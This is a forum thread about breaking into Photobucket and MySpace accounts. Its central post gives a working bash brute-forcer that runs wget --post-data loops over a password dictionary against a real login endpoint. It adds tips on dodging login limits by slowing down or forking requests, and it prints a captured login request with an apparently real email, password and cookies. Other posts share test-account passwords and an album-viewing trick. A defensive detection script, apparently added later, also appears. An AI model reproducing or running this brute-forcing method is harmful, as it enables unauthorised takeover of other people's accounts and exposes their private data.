matt

I want to hack my photobucket

88 posts in this topic

Wow, what a mess. Uhm.. Try not to respond to trolls next time. Sure they block your path to the bridge, but you can walk around em.

About the original question, which the original poster may never come back to read...

I've never learned to use brutus, but it seems complicated. Maybe someday it'll be worth learning. I can show you how to make a simple brute forcer in a shell script, though. Mighty powerful is wget.

First you find out the POST-DATA for the login form. You can read the HTML for the forms and patch it together, or open a packet sniffer, which will provide a very nice little line, i.e., for myspace:

POST /index.cfm?fuseaction=login.process&MyToken=50e6344b-f9e0-45f0-8564-c5d19839e2d1 HTTP/1.1

Host: login.myspace.com

User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

Referer: http://www.myspace.com/

Cookie: RBLOCKCNT=0; TIMEZONE=2; DERDB=ZG9tYWluPXlhaG9vJnRsZD1jb20mc21va2VyPS0xJnNleHByZWY9MSZ1dHlwZT0yJnJlbGlnaW9uaWQ9MyZyZWdpb249JnBvc3RhbGNvZGU9NTUzNjMmbWFyaXRhbHN0YXR1cz1SJmluY29tZWlkPTAmaGVpZ2h0PTE4MCZnZW5kZXI9TSZmcmll

bmRzPTEmZXRobmljaWQ9LTEmYWdlPTE4JmJvZHl0eXBlaWQ9LTEmY2hpbGRyZW5pZD0xJmNvdW50cnk9VVMmZGF0aW5nPTAmZHJpbmtlcj0xJmVkdWNhdGlvbmlkPTYmcnNpX3dhbnQ9MA==; AUTOSONGPLAY=0; MSCOUNTRY=US; MSCulture=IP=134.84.95.243&IPCulture=en-US&PreferredCulture=en-US&Country=US; MYSPACE=myspace; NGUserID=a282558-5104-1163031108-1; __utmz=102220221.1163038267.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=102220221.1787020356.1163038267.1163038267.1163077363.2; __utmb=102220221; __utmc=102220221

Content-Type: application/x-www-form-urlencoded

Content-Length: 156

email=tetsu2051%40yahoo.com&password=godlovessexnmoney&ctl00%24Main%24SplashDisplay%24login%24loginbutton.x=24&ctl00%24Main%24SplashDisplay%24login%24loginbutton.y=9

here is the client side communication to the myspace server. the post-data, specifically, is the "email=tetsu2051%40yahoo.com&password=godlovessexnmoney&ctl00%24Main%24SplashDisplay%24login%24loginbutton.x=24&ctl00%24Main%24SplashDisplay%24login%24loginbutton.y=9"

You can use post-data and actually log into myspace or any other authenticated system with wget by using the option --post-data. In this case, it would be

wget --post-data="email=tetsu2051%40yahoo.com&password=godlovessexnmoney&ctl00%24Main%24SplashDisplay%24login%24loginbutton.x=24&ctl00%24Main%24SplashDisplay%24login%24loginbutton.y=9" "http://www.myspace.com/index.cfm?fuseaction=login.process&MyToken=50e6344b-f9e0-45f0-8564-c5d19839e2d1"

You should notice the password field obvious in the post-data, ...&password=SOMEPASSWORD&...

There also seems to be a login session or 'token' here, so you might have to wget a login page first and grep for this MyToken variable. If this isn't the case, the following will work.

Make a file with passwords to try, and put it in a file, like dictionary.txt

Make a loop that will loop through the wget command, substituting your password for the attempting password.

for PASS in `cat dictionary.txt`; do

wget --post-data="email=tetsu2051%40yahoo.com&password=$PASS&ctl00%24Main%24SplashDisplay%24login%24loginbutton.x=24&ctl00%24Main%24SplashDisplay%24login%24loginbutton.y=9" "http://www.myspace.com/index.cfm?fuseaction=login.process&MyToken=50e6344b-f9e0-45f0-8564-c5d19839e2d1"

done

This will attempt to log in with every password. You may want to output the file (-O somefile.html) and grep for HTML you will get only if logged in properly, and write a conditional statement in the for loop to test if login has been successful. I don't feel like doing this, so here's pseudocode

for PASS in `cat dictionary.txt`; do

wget --post-data="email=tetsu2051%40yahoo.com&password=$PASS&ctl00%24Main%24SplashDisplay%24login%24loginbutton.x=24&ctl00%24Main%24SplashDisplay%24login%24loginbutton.y=9" "http://www.myspace.com/index.cfm?fuseaction=login.process&MyToken=50e6344b-f9e0-45f0-8564-c5d19839e2d1" -O attempt.html

grep "SOME HTML THAT IS ONLY IN LOGIN PAGE" attempt.html && echo $PASS && break;

done

The break will break out of the for loop and proceed from done if attempt.html contains the code. In fact, you could pipe wget to grep, and make it a neat (albeit slightly irritating) one-liner

for PASS in `cat dictionary.txt`; do

wget --post-data="...&password=$PASS&..." "http://www.myspace.com/index.cfm?fuseaction=login.process" -O - | grep "SOME HTML THAT IS ONLY IN LOGIN PAGE" attempt.html && echo $PASS && break;

done

If you want more info, you can use some conditional statements inside the for loop. This code will only print out anything if a login is successful. You can use numbered lines and some bash arithmetic if you want. For instance, linenum=`nl dictionary.txt | grep $PASS | awk '{print $1}'`; if [ $[$linenum%10] -eq 0 ]; then echo $PASS; fi; will print out every 10th password. If you wanted to go this route you may even want to numberline your dictionary file and awk the password out.

More importantly, in brute-forcing, time is most important, and every fraction of second you add between sends could be hours of testing. Also be aware of login limits, which most sites use nowadays. You may be able to attempt to brute force it, just very very very slowly, like over the course of a week. Patience is a virtue, of course, if you really want access. If timing is not a problem, you will want to multi-thread, like brutus does.

Multithreading can be accomplished with forks, the & symbol after a command. You do not want to start all of them at once. The site will immediately notice. It's almost akin to a DDoS, which no one likes, and is totally obvious.

A simple, off the top of my head idea would be to use a simple sleep in a while loop. I know it's not very awesome, but it works if I'm pressed for time.

(I'll use a read while loop here instead, it's easier.)

test() {

wget --post-data="...&password=$1&..." "http://somesite.com/login.cfm" | grep "SOME HTML" && echo $1 >> worked.txt

}

while read a;

test $a &

read a; test $a &

read a; test $a &

read a; test $a &

sleep 5; # should test this experimentally, try 5 logins at once and use time or something to test it

done < dictionary.txt

This is as complicated as I've ever gotten, if anyone has better solutions please fill me in!

(none of this code has been tested.)

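From the defender's side, the two pacing strategies the post above describes (a few parallel requests every few seconds, or guesses spread out over a week) leave different traces in login logs. The following is an added example, not part of the original thread; the event format, thresholds and sample data are constructed assumptions. It flags fast guessing per source IP and slow guessing per target account.

```python
from collections import defaultdict, deque

# Constructed sample events: (unix_time, source_ip, account, login_succeeded)
# BURST: 4 parallel failures every 5 s from one IP against one account.
BURST = [(1000 + 5 * (i // 4), "203.0.113.7", "alice", False) for i in range(20)]
# SLOW: one failure per hour against one account, rotated over three IPs.
SLOW = [(10_000 + 3600 * i, "198.51.100.%d" % (i % 3), "bob", False) for i in range(30)]
# NORMAL: a user mistypes once, then logs in.
NORMAL = [(2000, "192.0.2.10", "carol", False), (2030, "192.0.2.10", "carol", True)]
EVENTS = sorted(BURST + SLOW + NORMAL)


def detect_guessing(events, burst_window=60, burst_limit=10,
                    slow_window=7 * 86400, slow_limit=25):
    """Return (burst_ips, slow_accounts) flagged from time-ordered login events."""
    per_ip = defaultdict(deque)       # recent failure timestamps per source IP
    per_account = defaultdict(deque)  # recent failure timestamps per target account
    burst_ips, slow_accounts = set(), set()
    for ts, ip, account, ok in events:
        if ok:
            # A successful login clears that account's failure history.
            per_account[account].clear()
            continue
        for key, store, window, limit, flagged in (
            (ip, per_ip, burst_window, burst_limit, burst_ips),
            (account, per_account, slow_window, slow_limit, slow_accounts),
        ):
            q = store[key]
            q.append(ts)
            # Drop failures that have aged out of this detector's window.
            while q and q[0] <= ts - window:
                q.popleft()
            if len(q) >= limit:
                flagged.add(key)
    return burst_ips, slow_accounts


if __name__ == "__main__":
    ips, accounts = detect_guessing(EVENTS)
    print("burst sources:", sorted(ips))
    print("slowly targeted accounts:", sorted(accounts))
```

Counting failures per account as well as per IP is what catches the slow, multi-source case; a per-IP rate limit alone never sees it.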

Ok. I've always wondered how these brute force programs work. I was thinking that I might like to see if I can make one. Not to break into everyone's crap, just to see if I can make one.

I've set up a test account on photobucket.com to see if I can do it.

Anyone want to help?

Oh and if this is against the rules, and just looks like another "help me hack hotmail" topic then delete it. It's not that big a deal to me. It's just something I wanted to try.

I asked a long time ago how brute force programs work when it's online, but I can't find the topic. Yes, I searched.

Anyway, the account username is binrevmatt. (link)

The password is pretty simple. One word, no capital letters or numbers. I'm going to start with that.

Password is waste

Since I don't know who is posting their own information voluntarily, someone created an account for you all to test. Many people are coming here thinking they will get you to hax0r their girlfriend's photobucket account and whatnot; the moderators will delete any other accounts that are mentioned in this thread!

The test account is "binrevtest".

http://s85.photobucket.com/albums/k80/binrevtest/

Here is one image: http://i85.photobucket.com/albums/k80/binrevtest/11b7k86.jpg


It is a test account to see if photobucket security is reliable to evaluate whether or not its users should feel secure in using it. I do not authorize anyone doing any illegal activity with it, but I do not speak for photobucket and photobucket may not like you messing with their service. I feel like I should be able to test the service for security but this is just my opinion. If you violate their ToS, that is all on you. This account is simply to protect other potentially innocent accounts from being posted in our forums. It is not encouraging anyone to do anything to photobucket.

Remember, hacking is not about destruction! Don't be an asshat!

Pass is blahblah


I'm guessing this will mean more PMs about PB password retrieval and more PB emails for you Canti :P

I'm guessing this will mean more PMs about PB password retrieval and more PB emails for you Canti :P

Probably -_-

Note to every one. No I will not. Period.

I just posted as a proof of concept. The details of this will never be posted in public because of the potential danger it poses to young girls. IE password means access to email which means ease of locating the owner.

SO DO NOT ASK ME FOR DETAILS ON HOW TO DO THIS.


Also, there have been people in IRC and other places recently trying to SELL this trick to people. I don't know that it is anyone here (I hope not) but just be aware that you should never pay for stuff like this because 1) It might not work and 2) it will usually be fixed quickly and then you have nothing.

Selling information like this is totally against the hacker ethic! Do not support people who do this.


I'm guessing this will mean more PMs about PB password retrieval and more PB emails for you Canti :P

Probably -_-

Note to every one. No I will not. Period.

I just posted as a proof of concept. The details of this will never be posted in public because of the potential danger it poses to young girls. IE password means access to email which means ease of locating the owner.

SO DO NOT ASK ME FOR DETAILS ON HOW TO DO THIS.

I'll try not to ask you on how to do this but (just curious) did you use this?

http://www.binrev.com/forums/index.php?s=&...st&p=217249


I'm guessing this will mean more PMs about PB password retrieval and more PB emails for you Canti :P

Probably -_-

Note to every one. No I will not. Period.

I just posted as a proof of concept. The details of this will never be posted in public because of the potential danger it poses to young girls. IE password means access to email which means ease of locating the owner.

SO DO NOT ASK ME FOR DETAILS ON HOW TO DO THIS.

I'll try not to ask you on how to do this but (just curious) did you use this?

http://www.binrev.com/forums/index.php?s=&...st&p=217249

JtR isn't a new tool and I doubt this was what was used to find this information.


JtR isn't a new tool and I doubt this was what was used to find this information.

Not really that useful unless you can find the hashed password somehow. If you can, sweet.


Ok, I'm kinda confused on this

Is it that you just want to get your photobucket account

or do you want a brute forcing program

Oh well,

here's a way I found out how to view their pictures and/or save them

1) find a picture from the photo bucket you want to view/save the pictures of

2) right click on the picture

3) slide down to Properties and click on it

4) copy the image location, it should look like

http://i35.photobucket.com/albums/d168/*us...of_the_picture*

5) paste it into Notepad

6) then take the URL you just pasted and take off the *name of the picture*

Should look like this

http://i35.photobucket.com/albums/d168/*username*/

7) Copy and Paste that into the Address Bar

8) have fun looking at all the pictures

Edited by ansem227

Yeah, except that doesn't work if the user has a password, which is like 99% of them.

WOW! (google)

Why does this topic still exist?

I think that may be bad.

The solution is oldschool.

If anybody is interested in more:

http://www.hackthissite.org

(It's a free Hackground, to try some stuff. Also as: rootthisbox <-- link @ hackthissite)

HaNoCr

:)

Edited by Booter

.

Edited by %0A

You know what's crazy? I was just checking out some folks' photobuckets by typing in the usernames (boredom) and all of a sudden I could view everybody's photobucket. Each name I put in, I could see all of the pics for some reason... it just had login read only at the top of each one. It lasted for a day until it logged itself out.. I just gotta figure out how I did it. I haven't done it since then. Can anyone tell me how that could possibly have happened?

Can anyone hack a photobucket account?

No. Don't ask.


I can hack them ...

First Gimmie your Username

Then Gimmie Your Password

I'll email you the results ...

:grr:

Wakka Wakka Wakka

This is a great thing to get going and I would be very interested in this as well. I tried setting something up myself a while back but I still couldn't figure out how to get any of the brute force programs to work. I think I used JackTheRipper.

Are you taking a crack at my name?

This is a great thing to get going and I would be very interested in this as well. I tried setting something up myself a while back but I still couldn't figure out how to get any of the brute force programs to work. I think I used JackTheRipper.

Are you taking a crack at my name?

n00b :grr:

This is a great thing to get going and I would be very interested in this as well. I tried setting something up myself a while back but I still couldn't figure out how to get any of the brute force programs to work. I think I used JackTheRipper.

Are you taking a crack at my name?

n00b :grr:

nazi :grr:

This is a great thing to get going and I would be very interested in this as well. I tried setting something up myself a while back but I still couldn't figure out how to get any of the brute force programs to work. I think I used JackTheRipper.

Are you taking a crack at my name?

n00b :grr:

nazi :grr:

You have violated Godwin's law. You have the right to be ridiculed for ever and ever until the t00bz collapse.
